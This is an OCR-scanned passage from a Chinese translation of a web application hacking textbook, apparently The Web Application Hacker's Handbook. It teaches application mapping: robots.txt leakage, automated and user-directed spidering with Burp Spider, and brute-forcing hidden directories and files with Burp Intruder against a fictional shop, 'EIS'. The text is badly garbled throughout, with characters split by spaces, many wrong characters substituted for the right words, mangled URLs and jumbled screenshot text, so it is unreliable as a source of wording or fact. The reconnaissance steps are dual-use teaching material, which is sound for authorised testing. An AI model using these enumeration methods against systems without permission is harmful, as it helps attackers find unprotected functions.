提示 许多 Web 服 务 器 的 Web 根 目录 下 有 一 个 名 为 robots .txt 的 文件 ， 其 中 列 出 了 站 
和 | 点 不 希望 Web 让 由 访问 或 搜索 引擎 列 入 索引 的 URL。 有 时 ， 这 个 文件 中 还 包含 敏感 功 


能 的 参考 信息 ， 渗 透 测试 员 肯 定 会 对 抓 取 这 些 信息 感 兴 超 。 一 些 攻击 Web 应 用 程序 的 
抓 取 工 具 会 搜索 robots.txt 文 件 ， 并 根据 其 中 列 出 的 URL 开 始 抓 取 过 程 。 在 这 种 情 
况 下 ，robots.txt 文 件 可 能 会 危及 Web 应 用 程序 的 安全 。 





在 本 曹 中 ， 我 们 将 以 一 个 虚构 的 应 用 程序 Extreme Internet Shopping( EIS ) 为 例 ， 说 明和 常见 
的 应 用 程序 解析 操作 。 使 用 Burp Spider 解析 EIS 的 过 程 如 图 4-1 所 示 。 不 需要 登录 ， 即 可 以 解析 出 
/shop 目录 及 /media 目 录 中 的 两 件 新 商品 。 还 要 注意 的 是 ， 岁 中 显示 的 robots.txt 文 件 引 用 了 
/mdsecportal 和 /site-old 目 录 。 这 两 个 目录 没有 链接 到 应 用 程序 中 的 任何 位 置 ，Web 疏 虫 仅仅 通过 
访问 公开 内 容 中 的 链接 不 可 能 发 现 这 些 目录 。 














四 
4 burp suite professional 








burp intruder repeater window help 





target | proxy | spider | scanner | intruder | repeater | Sequencer | decoder | comparer | options | alerts | 
site map I scope 


| Filter: hiding CSS., image and general binary content; hiding 4x responses 


9- http://eis host method arame sus 
D1 tp:/leis GET ”robots tt [|200 |48 


9- 钨 auth 
器 ForgotPassword 
~ 于 Login 
~ 自 gb 
9- 岛 home 


Dr 
jd 
c 和 icons | | 
~ 国 images response [request| 
| raw | headers | hex 
际 


HTTP/1.1 200 OK 
?全 | pub DaLe; Mun, 24 Jarl 2011 16;24:;29 GMT 
I Server: Ayache 









































9- 鲍 media Last=Modified: Non, 24 Jan 2011 .16:24:11 GNT 
c 转 100 ETag: "265c2-de-49a9a07a900c0" 


be 117 Accept-Ranges: bytes 
, Content-Length: 222 
Vary: Accept-Encoding 
9 - 久 shop Connection: close 
~ 渤 / Content-Type: text/plain 
9?- 久 browse 到 
6- /Bn bocks # robots.-xt for http://eis 
让 园 dlothing User-agen-: * 
~ 筷 | eledtronics Disallow: /mdsecportal/ # Admin Portal Site. 
~ 各 | home Disallow: /site-old/ # these will soon disappear 
c 咎 | office but needed for partner companies 
= 压 sorware Disallow: /shon # No old nricind should he indewed 
c- 各]| tools 
[DD browse 
~ 渤 search 
c 入 | static 









































图 4-1 使 用 Burp Spider 解析 应 用 程序 的 部 分 内 容 
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提示 采用 REST 风 格 的 URL 的 应 用 程序 使 用 部 分 URL 文 件 路 径 来 唯一 标识 应 用 程序 所 
Y 使 用 的 数据 和 其 他 资源 (请 参阅 第 3 章 了 解 详情 )。 在 这 些 情况 下 ,传统 Web 让 中 的 基 


于 URL 的 应 用 程序 视图 非常 有 用 。 在 EIS 应 用 程序 中 ，/shop 和 /pub 路 径 采 用 了 REST 风 
格 的 URL， 抓 取 这 些 区 域 即 可 轻松 获取 这 些 路 径 中 的 商品 的 唯一 链接 。 








管 通 第 能够 进行 有 效 的 抓 取 , 但 这 种 完全 目 动 化 的 方法 在 内 容 枚 举 方面 还 存在 一 些 重要 的 

限制 。 

口 这 些 工 具 一 般 无 法 正确 人 处理 不 常用 的 导航 机 制 ( 如 使 用 复杂 的 JavaScript 代 码 动态 建立 和 
处 理 的 染 单 )， 因 此 可 能 会 遗漏 应 用 程序 某 个 方面 的 功能 。 

口 爬虫 可 能 无 法 抓 取 到 隐藏 在 编译 客户 问 对 象 ( 如 Flash 和 Java applet ) 中 的 链接 。 

口 多 阶段 功能 往往 会 严格 地 执行 输入 确认 检查 ， 因 而 可 能 不 会 接受 由 目 动 工具 提交 的 值 。 
例如 ， 用 户 注 册 表 单 中 可 能 包含 姓名 、 电 子 邮 件 地 址 、 电 话 号 码 和 邮政 编码 字段 。 上 自动 
应 用 程序 爬虫 通 稼 会 问 每 一 个 可 编辑 的 表单 字段 提交 一 个 单独 的 测试 字符 串 ， 而 应 用 程 
序 将 返回 一 条 错误 消息 ， 称 其 提交 的 一 个 或 几 个 数据 无 效 。 由 于 怜 虫 并 没有 能 力 理解 这 
种 错误 消息 并 采取 相应 行动 ， 所 以 也 就 无 法 成 功 通过 注册 ， 因 此 无 法 发 现 这 以 后 的 任何 
其 他 内 容 或 功能 。 

口 目 劲 化 稚 虫 通 癌 使 用 URL 作 为 内 容 标识 符 。 为 避免 进行 连续 不 确定 的 抓 取 ， 如 有 爬虫 认 
识 到 链接 内 容 已 被 请 求 ， 它 们 会 识别 出 来 并 且 不 会 再 回 其 发 出 请 求 。 但 是 ， 许 多 应 用 程 
序 使 用 基于 表单 的 导航 机 制 ， 其 中 相同 的 URL 可 能 返回 截然 不 同 的 内 容 和 功能 。 例 如 ， 
一 个 银行 应 用 程序 可 能 通过 一 个 指 癌 /account . ] sp 的 POST 请 求 执 行 每 一 项 用 户 操 作 
并 使 用 参数 传达 执行 的 操作 。 如 采 疏 虫 拒绝 回 这 个 URL 提 交 多 次 请 求 ， 它 承 会 遗漏 应 用 
程序 的 大 部 分 功能 。 一 些 应 用 程序 爬虫 试图 解决 这 一 问题 (例如 , 可 对 Brup Spider 进行 配 
置 ， 使 其 根据 参数 名 称 和 参数 值 对 提交 的 表单 进行 “个 性 化 ”处 理 )。 但 是 ， 在 许多 情况 
下 ， 这 种 完全 目 动 化 的 方法 并 非 绝对 有 效 。 本 半 后 面 我 们 会 讨论 解析 这 一 功能 的 方法 。 

口 与 前 面 的 情形 恰恰 相反 ， 一 些 应 用 程序 在 URL 中 插入 实际 上 并 不 用 于 确定 资源 或 功能 的 
可 变数 据 ( 例如， 包含 定时 器 或 随机 数 种 子 的 参数 )。 应 用 程序 的 每 个 页 面 中 都 可 能 包含 
一 组 似乎 是 人 息 虫 必须 请 求 的 新 URL， 导 致 它 不 断 进 行 不 确定 的 抓 取 。 

口 如 果 应 用 程序 使 用 身份 验证 机 制 ， 应 用 程序 爬虫 要 实现 有 效 抓 取 ， 必 须 能 够 处 理 这 种 机 
制 才能 访问 它 所 保护 的 功能 。 如 采 为 其 手动 配置 一 个 通过 验证 的 会 话 令 牌 或 提 区 给 登录 
功能 的 证 书 ， 前 面 提 到 的 爬虫 就 能 实现 有 效 抓 取 。 然 而 ， 即 使 获得 令 牌 或 证 书 ， 由 于 各 
种 原因 ， 扑 虫 执 行 的 一 些 操作 也 会 让 通过 验证 的 会 话 中 汤 。 

@ 由 于 访问 所 有 URL， 扑 虫 会 在 某 个 时 候 请 求 退 出 功能 ， 人 致使 会 话 中 断 。 

@ 如 有 果 扑 忠 癌 某 个 敏感 功能 提交 无 效 输入 ， 应 用 程序 可 能 会 进行 自我 防御 ， 终 止 会 话 。 
@ 如 生 应 用 程序 在 每 个 页 面 都 使 用 令 牌 ， 疏 虫 肯定 无 法 按 正 确 的 顺序 请 求 页 面 ， 这 可 能 
引起 应 用 程序 结束 整个 会 话 。 
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警告 ”在 一 些 应 用 程序 中 ， 即 使 运行 一 个 解析 并 请 求 链接 的 简单 Web 扑 中 也 可 能 极其 
危险 。 例如， 应 用 程序 可 能 具有 删除 用 户 、 关 闭 数 据 库 、 重 启 服务 器 等 管理 功能 。 如 
果 使 用 应 用 程序 感知 的 息 屿 ， 该 疏 虫 发 现 并 使 用 敏感 功能 ， 就 可 能 造成 巨大 损失 。 我 


们 曾经 遇 到 一 个 应 用 程序 具有 某 种 内 容 管 理 系统 (CMS ) 功能 ， 它 可 编辑 主 应 用 程序 
的 实际 内 容 。 这 项 功能 可 通过 站 点 地 图 发 现 ， 并 且 没 有 受到 任何 访问 控制 的 保护 。 如 
果 针 对 这 个 站 点 运行 自动 化 想来 ， 它 就 会 发 现 编 辑 功能 并 开始 发 送 任意 数据 ， 和 致使 主 
Web 站 点 的 内 容 在 爬虫 运行 时 就 被 捏 曲 。 





4.1.2 用 局 指定 的 抓 取 


这 是 一 种 更 加 复杂 且 可 控制 的 技巧 , 它 比 自动 化 抓 取 更 加 先进 。 用 户 使 用 它 通 过 标准 浏览 攻 
以 稼 规 方式 浏览 应 用 程序 ， 试 图 枚 举 应 用 程序 的 所 有 功能 。 之 后 , 生成 的 流量 穿 过 一 个 组 合 拦截 
代理 服务 天 与 爬虫 的 工具 ,监控 所 有 请 求 和 啊 应 。 该 工具 绘制 应 用 程序 地 图 、 集 中 由 浏览 融 访问 
的 所 有 URL, 并 且 像 一 个 正常 的 应 用 程序 感知 仆 虫 那样 分 析 应 用 程序 的 啊 应 , 同时 用 它 发 现 的 内 
容 与 功能 更 新 站 点 地 图 。Burp Suite 和 WebScarab 中 的 候 虫 即 可 用 于 这 种 用 途 ( 请 参阅 第 20 划 了解 
详细 信息 )。 
相 比 于 基本 的 抓 取 方 法 ， 该 技巧 具有 诸多 优点 。 
口 如 有 果 应 用 程序 使 用 不 常用 或 复杂 的 导航 机 制 ， 用 户 能 够 以 常规 方式 使 用 浏览 絮 来 遵循 这 
些 机 制 。 用 户 访问 的 任何 功能 和 内 容 将 由 代理 服务 天 /爬虫 工具 处 理 。 
口 用 户 控制 提交 到 应 用 程序 的 所 有 数据 ， 这 样 可 确保 满足 数据 确认 要 求 。 
口 用 户 能 够 以 常规 方式 登录 应 用 程序 ， 确 保 通 过 验证 的 会 话 在 整个 解析 过 程 中 保持 活动 状 
态 。 如 果 所 执行 的 任何 操作 导致 会 话 终止 ， 用 户 可 重新 登录 并 继续 浏览 。 
口 由 于 该 技巧 可 从 应 用 程序 的 啊 应 中 解析 出 链接 ， 因 而 它 能 够 完整 枚 举 任何 危险 功能 ( 如 
deleteUser.jsp )， 并 能 将 其 合并 到 站 点 地 图 中 。 但 是 用 户 可 以 根据 目 己 的 判断 决定 请 
求 或 执行 哪些 功能 。 
在 Extreme Internet Shopping 站 点 中 ， 以 前 爬虫 无 法 为 home 中 的 任何 内 容 建立 索引 ， 因 为 这 
些 内 容 已 通过 验证 。 针 对 /home 的 请 求 将 导致 以 下 啊 应 : 
HTTP/1.1 302 Moved Temporarily 
Date: Mon, 24 Jan 2011 16:13:12 GMT 


Server: Apache 
Location: /auth/Login?ReturnURL=/home/ 


通过 用 户 指 导 的 抓 取 ， 用 户 可 以 直接 使 用 浏览 器 登录 应 用 程序 ， 随 后 代理 服务 器 / 扑 虫 工具 
将 提取 生成 的 会 话 , 并 确定 现在 对 用 户 可 用 的 所 有 其 他 内 容 。 用户 成 功 通 过 应 用 程序 受 保 护 区 域 
的 验证 时 的 EIS 站 点 地 图 如 图 4-2 所 示 。 

这 揭示 了 主 末 单 系统 中 的 其 他 一 些 资 源 。 该 图 显示 了 一 个 对 私有 用 户 资 料 的 引用 ,此 用 户 资 
料 通过 onc1lick 事 件 处 理 程序 启动 的 JavaScript 阴 数 访问 : 


<a href="#" onclick="ui nav('profile'}'">private profile</a> 
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burp intruder repeater window help 
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9?- http://eis 
[a 
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口 ForgotPassword 
~ 渤 Login 
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4.1 枚 举 内 容 与 功能 








“target | proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts 


Filter: hiding CSS, image and general binary content; hiding 4x responses 





4 





' response | request 
?4 


“headers | ”render 
<br> 


<br> 

<a href="#¥" onclick="ui navl|'Profile')">private 
profile</a><br /> 

<a href="/pub/user/l1l">public profile</a><hr /> 
<a href="/home/myaccount">account 
information</a><br> 


5 





index EIS</a><b-> 
<a href="/home/search">search the store</a><br> 


<a href="/home/redgister">register a card with 


<a href="/home/partner">partners</a><br> 
<a href="/gb">leave feedhack</a><br> 


RY 
SiteSspeed 2.0 StatOut 
<a 
href="httn://Peis/core/sitestats ?naceTN=/homesdisnliay 
=rank| hits| time">stats</a> 
ee 

robots .txt 
9?- 岛 shop </div> 
</html> 

















图 4-2 ”执行 用 户 指导 的 抓 取 后 Burp 显 示 的 站 点 地 图 


由 于 传统 的 Web 疏 虫 仅仅 抓 取 HTML 中 的 链接 ， 因 此 可 能 会 遗漏 这 种 类 型 的 链接 。 即 使 是 最 
先进 的 目 动 化 应 用 程序 爬虫 ， 仍 然 无 法 抓 取 当 前 应 用 程序 和 浏览 融 扩 展 所 采用 的 各 种 导航 机 制 。 
但 是 ， 通 过 用 户 指 导 的 抓 取 ， 用 户 只 需 使 用 浏览 需 访 问 屏幕 上 可 见 的 链接 ， 代 理 服务 顺 /爬虫 工 
具 就 会 将 生成 的 内 容 添 加 到 站 点 地 图 中 。 

相反 ， 值 得 注意 的 是 ， 扑 虫 已 成 功 确定 HTML 注 释 中 包含 的 指 问 /core/sitestats 的 链接 ， 即 使 
该 链接 并 未 在 屏保 上 问 用 户 显示 。 








提示 除 上 面 描述 的 代理 服务 器 / 爬 豆 工具 外 ， 在 应 用 程序 解析 过 程 中 ， 我 们 还 经 常 使 
用 一 些 其 他 工具 ， 如 可 从 浏览 器 界面 执行 HTTP 和 HTML 分 析 的 各 种 浏览 器 扩展 工具 。 
例如 ， 图 4-3 所 示 的 下 Watch 工 具 可 在 Microsoft Internet Explorer 中 运行 ， 对 所 有 请 求 和 


响应 ( 包括 消息 头 、 请 求 参 数 与 cookie ) 进行 监控 ， 并 分 析 每 一 个 应 用 程序 页 面 ， 以 显 
示 链 接 、 肢 本、 表单 和 厚 客 户 端 组 件 。 虽 然 可 以 在 拦截 代理 服务 器 中 查看 所 有 这 些 信 
息 ， 但 是 ， 拥 有 另 一 份 解 析 数 据 有 助 于 更 好 地 了 解 应 用 程序 ， 并 枚 举 它 的 所 有 功能 。 


请 参阅 第 20 章 了 解 有 关 这 种 工具 的 详细 信息 。 





























Username: 
Password: | Login | 
Register 总 
站 国 遇 | 基 | 信 各 | 败 - 格 | 量 | 和 首 -| 图 -| 己 * 司 

Time Duration Size Method IP Address Status “ Content Type URL Note 人 
12:51:23.729 0.156s 1189 GET 200 text/html;c... https://mdsec.net/auth/4/Default.ashx Login 
12:51:38,041 0.000s 7571 GET (Cac.. image/png https://mdsec.net/wahh.png Login | 
12:51:38.057 1.157 s 1635 GET 404 text/html https://mdsec.net/favicon.ico Login 
12:51:42.,885 0.688 s 140 POST 302 text/html;c... https://mdsec.net/auth/4/Default.ashx Login 
12:51:48.307 0.125s 1009 GET 200 ted/html; c... https://mdsec.net/auth/4/Home.ashx Login ~ 
* Mh 上 
x RequestHeader Name Request Header walue x Response Header Name Responss Header Value 
ey [Method-Line] POST ,authy4Defaultashs HTTPA.1 s [Status-Line] HTTP21.1 302 Found 
号 | Accept testyhtml ,applicationshtml+sml “A* | Date Mon, 13Jun 2011 11:51:48 GMT 
8 Referer https: A /mdsec.net/authid:Default.ash» 3 | Server hicrosoftllS #6.0 
二 &ccept-Language errGBB © | MicrosoftDfhcewebserver 5.0_ Pub 
a | Useragent Mozilaz5.0 [compatible; MSIE 3.0: wwi..， 名 | xx-Powered-By SP.NET 
[qd 

| | Content-Type applicationyx-www-form-urlencoded Ey “BaspNet-yersion 2.0.50727 

演 &ccept-Encoding gzp. deflate Location sauthid/dome.ashx 

= Host mdsec.net Set-Cookie Sessionld_test.login._4=E1BCCF7414... 

Content-Length 27 [Cache-Control no-cache 

所 Connection Keep-Aalive Pragma no-cache 

CC ~ » 四 . a mm 人 a 

三 倪 Request Headers | 1 咕 Response Headers | 如 Response Cookies | 思 ! Content 

mm 

车 | 是 HTTP Analysis | 国 HTML Analysis 











图 4-3”IEWatch 在 浏览 硕 中 进行 HTTP 和 HTML 分 析 


渗透 测试 步骤 
(1) 配置 浏览 硕 ， 使 用 Burp 或 WebScarab 作 为 本 地 代理 服务 絮 ( 如 果 不 确定 ， 请 参阅 第 20 
草 了 解 相 关 信 息 








(2) 以 常规 方式 浏览 整个 应 用 程序 ， 访 问 发 现 的 每 一 个 链接 /URL， 提 交 每 一 个 表单 并 执行 
全 部 多 阶段 功能 。 壬 试 在 JavaScript 激 活 与 禁用 、cookie 激 活 与 禁用 的 情况 下 进行 浏览 。 许 多 应 
用 程序 能 够 处 理 各 种 浏览 需 配 置 ， 可 以 获取 应 用 程序 内 的 不 同 内 容 和 代码 路 径 。 

(3) 检查 由 代理 服务 器 /爬虫 工具 生成 的 站 点 地 图 ， 确 定 手动 浏览 时 没有 发 现 的 所 有 应 用 程 
序 内 容 或 功能 。 确定 爬 下 如 何 枚 举 每 一 项 内 容 , 例如 , 在 Burp Spider 中 , 检查 “链接 上 自 ”( Linked 
From ) 的 详细 内 容 。 通 过 浏览 喜 访 问 这 些 内 容 ， 以 使 代理 服务 套 / 爬 虫 工具 检查 服务 需 啊 应 ， 
从 而 确定 其 他 所 有 内 容 。 继 续 递 归 执 行 上 述 步 又 ， 直 到 无 法 再 确定 其 他 内 容 或 功能 。 

(4) 另外 ， 还 可 以 要 求 工 具 以 已 经 枚 举 的 所 有 内 容 为 基础 ， 主 动 抓 取 站 点 内 容 。 首 先 ， 请 
确定 任何 危险 的 或 可 能 会 中 断 应 用 程序 会 话 的 URL, 并 配置 疏 虫 , 将 它们 排除 在 抓 取 范围 之 外 。 
运行 息 虫 并 检查 它 发 现 的 结果 以 查找 其 他 所 有 内 容 。 

在 代理 服务 需 / 爬 虫 工具 生成 的 站 点 地 图 中 包含 大 量 关 于 目标 应 用 程序 的 信息 ， 稍 后 可 以 
利用 它们 确定 应 用 程序 雄 露 的 各 种 受 攻击 面 。 



































4.1.3 发现 隐藏 的 内 容 
应 用 程序 常常 包含 没有 直接 链接 或 无 法 通过 可 见 的 主要 内 容 访 问 的 内 容 和 功能 , 在 使 用 后 没 
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有 删除 测试 或 调试 功能 就 是 一 个 常见 的 示例 。 

为 一 个 例子 是 ， 应 用 程序 为 不 同类 型 的 用 户 ( 如 匿名 用 户 、 通 过 验证 的 常规 用 户 和 管理 员 ) 
提供 不 同 的 功能 ,在 某 种 权限 下 对 应 用 程序 进行 彻底 抓 取 的 用 户 会 遗 源 拥有 为 一 种 权限 的 用 户 可 
使 用 的 功能 。 发 现 相关 功能 的 攻击 者 可 利用 这 些 功能 提升 其 在 应 用 程序 中 的 权限 。 

还 存在 许多 前 面 描述 的 解析 技巧 无 法 确定 的 重要 内 容 和 功能 ， 如 下 所 示 。 

口 备份 文件 。 如 末 使 用 动态 页 面 ， 它 们 的 文件 扩展 名 可 能 已 变 成 不 可 执行 文件 扩展 名 ， 可 

通过 审查 页 面 源 代码 查找 可 在 主页 中 加 以 利用 的 漏洞 。 

D 包含 Web 根 目录 下 (或 根 目录 外 ) 完整 文件 快照 的 备份 档案 ,可 以 使 用 它 迅 速 确 定 应 用 程 



































序 的 所 有 内 容 与 功能 。 
口 部 赣 在 服务 角 上 、 用 于 测试 目的 但 尚未 在 主 应 用 程序 中 建立 链接 的 新 功能 。 
口 定制 应 用 程序 中 的 默认 应 用 程序 功能 对 用 户 不 可 见 ， 但 在 服务 硕 端 仍然 可 见 。 
口 尚未 从 服务 内 中 删除 的 旧版 本 文件 。 如 采 使 用 动态 页 面 ， 这 些 文件 中 可 能 包含 当前 版 本 4 





已 经 修复 、 但 仍然 可 以 在 旧版 本 中 加 以 利用 的 漏洞 。 

口 配置 和 包含 敏感 数据 〈 如 数据 库 证 书 ) 的 文件 。 

口 编 详 现 有 应 用 程序 功能 的 源 文件 。 

口 极端 情况 下 ， 源 代码 中 可 能 包含 用 户 名 和 密码 等 信息 ， 但 更 可 能 提供 有 关 应 用 程序 状态 
的 信息 。 如 果 某 个 位 置 出 现 “ 测 试 此 功能 ”( test this function ) 或 类 似 的 关键 短语 ， 应 立 
即 从 此 处 开始 探查 源 洞 。 

口 包含 有 效用 户 名 、 会 话 令 牌 、 被 访问 的 URL 以 及 所 执行 操作 等 敏感 信息 的 日 志文 件 。 

发 现 隐藏 的 内 容 需要 组 合 使 用 目 动 和 手动 技巧 ， 而 且 往往 需要 一 定 的 运气 。 

1. 查 力 技巧 

第 14 草 将 介绍 攻击 者 如 何 利 用 自动 技巧 提高 攻击 应 用 程序 的 效率 ,现在 可 以 利用 目 动 技巧 问 

Web 服 务 融 提出 大 量 请 求 ， 和 尝试 猜测 隐藏 功能 的 名 称 或 标识 符 。 

例如 ， 假 设 用 户 指定 的 抓 取 已 经 确定 有 以 下 应 用 程序 内 容 : 

http://eis/auth/Login 

http:/ /eigs/auth/ForgotPaseword 

http://eis/home/ 


http://eis/pub/media/l100/view 
http://eis/images/eis.g1if 
































http://eis/include/eis.css 
首先 ， 试 图 确定 隐藏 内 容 的 自动 化 工具 将 提出 下 列 请 求 ， 以 定位 其 他 目录 : 
http://eis/About/ 


http://eis/abstract/ 
http://eis/academics/ 








http://eis/accessibility/ 
http://eis/accounts/ 
http://eis/action/ 
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Burp Intruder 可 用 于 循环 访问 一 组 常见 的 目录 名 称 并 收集 服务 紫 的 啊 应 信息 ， 可 通过 检查 这 
些 信息 来 确定 有 效 的 目录 。 图 4-4 表 示 正 在 配置 Burp Intruder 探 查 Web 根 目录 中 的 常见 目录 。 


的 和 





了 攻击 后 ， 单 击 status 和 length 等 标题 栏 会 对 其 中 的 结果 进 


burp intruder repeater window help 





length: 321 


User-Agent: Nozilla/5.0 (Windows; U; Windows NT 6€6.1; en-GB; rv:1.9.2.13) 
Gecko/20101203 Firefox/3.6.13 

Accept: text/html,application/xhtml+xml,application/xml;d=0.9,*/*;c=0.8 
Accept-Language: en-gbh,en;d=0.5 

Accept—-Encod:ng: gzip,deflate 

Accept-Charset: ISO-8859-1,utf-B;q=0.7,*;dq=D.7 


sisliadl | Omatches 


图 4-4 配置 Burp Intruder 探 查 常 见 目 录 


如 图 4-5 所 示 。 


attack save columns 


Filter: showing all iems 
request i status sor meo. lengt comment 
”ke 2096 baseline ee ee 一 
| 


200 [一 1938 
zol ma 0 





about-us 404 
ae | US 04 


GET /shop/ HTTP/1.1 

Host: eis 

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; 
rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 

Accept: 
text/html,application/xhtml+xml,application/xml;dq=0.9,*/*;dq=0 
二 

IAccept-Language: en-gb,en;dq=0.5 





图 4-5 ”Burp Intruder 显 示 目 录 蛮 力 攻击 结 


行 相 应 分 类 ， 有 助 于 迅速 发 


现 


= 
下 
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对 日 录 和 子 日 录 进 行 蛋 力 攻击 后 , 就 可 以 查找 应 用 程序 中 的 其 他 页 面 。 这 时 ，/auth 目 录 特 别 
有 用 ,其 中 包含 在 抓 取 过 程 中 确定 的 登录 资源 ,对 未 通过 验证 的 攻击 者 而 言 ,这 可 能 是 一 个 不 错 
的 起 点 。 同 样 ， 攻 击 者 可 以 请 求 该 目录 中 的 一 系列 文件 : 


http://eis/auth/About/ 
http://eis/auth/Aboutus/ 
http://eis/auth/AddUser/ 
http://eis/auth/Admin/ 
http://eis/auth/Administration/ 
http://eis/auth/Admins/ 





此 攻击 的 吉 末 如 图 4-6 所 示 ， 它 确定 了 /auth 目 录 中 的 一 些 资 源 : 


Login 
Logout 
Register 





Profile 


es | roet | positons | payioads | optons | 
[eguest payoad [status eror hmeo | lengh | comment 


Po tm 0 


baseline requUest 


IGET /auth/Register HTTP/1.1 

HogEts Cig 

Accept: */* 

Accept-Language: en 

User-Agent: NMozilla/4.0 Icompatible; MSIE 7.0; Windows NT 6.0) 
Connection: close 

Content-Length: 6€ 


[IE | Omatches 
[ished | 





图 4-6 ”Burp Intruder 显 示 文 件 午 力 攻 击 结 


值得 注意 的 是 ， 针 对 Profile 的 请 求 返 回 了 HTTP 状 态 码 302。 这 表示 如 果 未 经 验证 访问 此 
链接 , 用 户 将 被 重 定 向 到 登录 页 面 。 此 外 , 虽然 Login 页 面 已 在 抓 取 过 程 中 被 发 现 , 但 Register 
页 面 尚 未 被 发 现 。 这 可 能 说 明 此 功能 可 以 运行 ， 攻 击 者 能 够 在 该 站 点 上 注册 一 个 用 户 账户 。 
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注解 不 要 想当然 地 认为 : 如 果 被 请 求 的 资源 存在 ， 应 用 程序 将 返回 200 OK 响应 ， 否 
则 将 返回 404 Not Found 响 应 。 许 多 应 用 程序 以 自 定义 的 方式 处 理 访问 不 存在 资源 的 
请 求 ， 通 党 返回 一 个 市 200 响 应 码 的 预定 义 错误 消息 。 而 且 , 一 些 访问 现存 资源 的 请 求 
可 能 会 收 到 非 200 响 应 。 下 面 简要 说 明 在 使 用 变 力 技巧 查找 隐藏 内 容 时 可 能 遇 到 的 响应 
码 的 含义 。 
口 302 Found。 如 果 重 定向 指向 一 个 登录 页 面 ， 那 么 只 有 通过 验证 的 用 户 才 能 够 
访问 该 资源 ; 如 果 指 向 一 个 错误 消息 ， 就 可 能 披露 其 他 不 同 的 原因 ; 如 果 指 向 
另 一 个 位 置 ， 重 定向 可 能 属于 应 用 程序 特定 逻辑 的 一 部 分 ， 应 深入 分 析 。 
口 400 Bad Request。 应 用 程序 可 能 对 URL 中 的 目录 和 文件 名 使 用 定制 的 命 
et 
的 词汇 中 包含 一 些 空白 符 或 其 他 无 效 的 语法 。 
口 401 Unauthorized 或 403 Forbidden。 该 响应 通常 表示 被 请 求 的 资源 存在 ， 
但 不 管用 户 的 验证 状态 或 权限 等 级 如 何 ， 禁 止 任 何 用 户 访问 该 资源 。 请 求 目录 
时 往往 会 返回 此 响应 ， 可 以 据 此 推断 所 请 求 的 目录 确实 存在 。 
口 500 Internal Server Error。 在 查找 内 容 的 过 程 中 ， 该 响应 通常 表示 应 用 
程序 希望 在 请 求 资源 时 提交 某 些 参数 。 

















由 于 各 种 可 能 的 啊 应 都 可 表示 存在 茶 些 重要 内 容 , 因而 很 难 编写 出 一 段 完全 目 动 化 的 脚本 来 
输出 一 组 有 效 资 源 。 最 佳 方法 是 在 使 用 蛋 力 技巧 时 尽 可 能 多 地 收集 与 应 用 程序 有 关 的 信息 ,并 对 
其 进行 手动 检查 。 




















渗透 况 | 试 步 
i 
(2) 使 用 用 户 指 定 的 抓 取 生 成 的 站 点 地 图 作为 自动 查找 隐藏 内 容 的 基础 。 














(3) 自动 提出 访问 应 用 程序 内 已 知 存在 的 每 个 目录 或 路 径 中 和 常用 文件 名 和 目录 的 请 求 。 使 
用 Burp Intruder 或 一 段 定 制 脚本 ， 结 合 党 用 文件 名 和 目录 词汇 表 ， 了 迅速 生成 大 量 请 求 。 如 有 果 已 
经 确定 应 用 程序 处 理 访 问 无 效 资 源 请 求 的 特定 方式 (如 有 自 定 义 的 fe not found 页 面 )， 应 配置 
Intruder 或 脚本 突出 显示 这 些 结果 ， 以 便 将 其 忽略 。 

(4) 收集 从 服务 禹 收 到 的 啊 应 ， 并 手 劲 析 查 这 些 啊 应 以 确定 有 效 的 风 源 。 

(5) 反复 执行 这 个 过 程 ， 直 到 发 现 新 内 容 。 














2. 通过 公布 的 内 容 进行 推测 
许多 应 用 程序 对 其 内 容 与 功能 使 用 某 种 命名 方案 。 通 过 应 用 程序 中 已 经 存在 的 资源 进行 推 
汤 ， 可 以 调整 日 动 枚 举 操 作 ， 提 融 发 现 其 他 隐藏 内 容 的 可 能 性 。 
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请 注意 ， 在 EIS 应 用 程序 中 ，/auth 中 的 所 有 资源 均 以 大 写字 母 开 头 ， 这 就 是 上 一 节 的 文件 蛮 
力 攻 击 中 使 用 的 单词 表 有 意 大 写 的 原因 。 而 且 ， 既 然 我 们 已 在 /auth 目 录 中 确定 了 一 个 名 为 
ForgotPassword 的 页 面 ， 我 们 就 可 以 在 其 中 搜索 其 他 名 称 类 似 的 项 目 ， 例 如 : 

http://eis/auth/ResetPassword 

此 外 ， 在 用 户 指 导 的 抓 取 过 程 中 创建 的 站 点 地 图 确定 了 以 下 资源 : 

http://eis/pub/media/10C 


http://eis/pub/media/117 
http://eis/pub/user/11 


其 他 类 似 范 围 的 数值 可 用 于 确定 其 他 资源 和 信息 。 

















提示 “Burp Intruder 高 度 可 定制 化 ， 并 且 可 用 于 针对 HTTP 请 求 的 任何 部 分 。 图 4-7 显 
示 了 如 何 使 用 Burp Intruder 对 前 半 部 分 文件 名 实施 变 力 攻击 ， 以 提出 下 列 请 求 : 


http://eis/auth/AddPassword 





http://eis/auth/ForgotPassword 
http://eis/auth/GetPassword 
http://eis/auth/ResetPassword 
http://eis/auth/RetrievePassword 


http://eis/auth/UpdatePassword 











[os 
人 burp suite professional 








burp intruder repeater window help 





「 target | proxy | spider | scanner | intruder | repeater | sequencer | decoder | comparer | options | alerts | 
[1 [gl 


target | positions | payloads | options | 























attack type |sniper Se 








1 payload position length: 167 
GET /auth/BePassword HTTP/1.1 [a 
Host: eis 

Accept: */* 

Accept-Languadge: en 

User-AMgent: Mozilla/4.0 (Icompatible; MSIE 7.0; Windows NT 6.0) 
Connection: close 


























| 0 matches 


























图 4-7 使 用 Burp Intruder 对 部 分 文件 名 实施 定制 蛮 力 攻击 





渗透 测试 步 又 

(1) 检查 用 户 指定 的 浏览 与 基本 这 力 测试 获得 的 结果 。 编 详 枚 举 出 的 所 有 子 目 录 名 称 、 文 
件 词 干 和 文件 扩展 名 列表 。 

(2) 检查 这 些 列表 ， 确 定 应 用 程序 使 用 的 所 有 命名 方案 。 例 如 ， 如 有 果 有 些 页 面 的 名 称 为 
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AddDocumentjsp 和 ViewDocumentjsp， 那 么 可 能 还 有 叫做 EditDocumentjsp 和 RemoveDocument.jsp 
的 页 面 。 通 销 ， 只 需要 查看 几 个 示例 ， 就 能 推测 出 开发 者 的 命名 习惯 。 根 据 其 个 人 风格 ， 开 发 
者 可 能 采用 各 种 命名 方法 ， 如 宛 长 式 (AddANewUserasp )、 人 简洁 式 (AddUserasp )、 使 用 缩写 
式 (AddUsrasp ) 或 更 加 模糊 的 命名 方式 (AddU.asp )。 了 解 开 发 者 使 用 的 命名 方式 有 助 于 猜 
测 出 尚未 确定 的 内 容 的 准确 名 称 。 

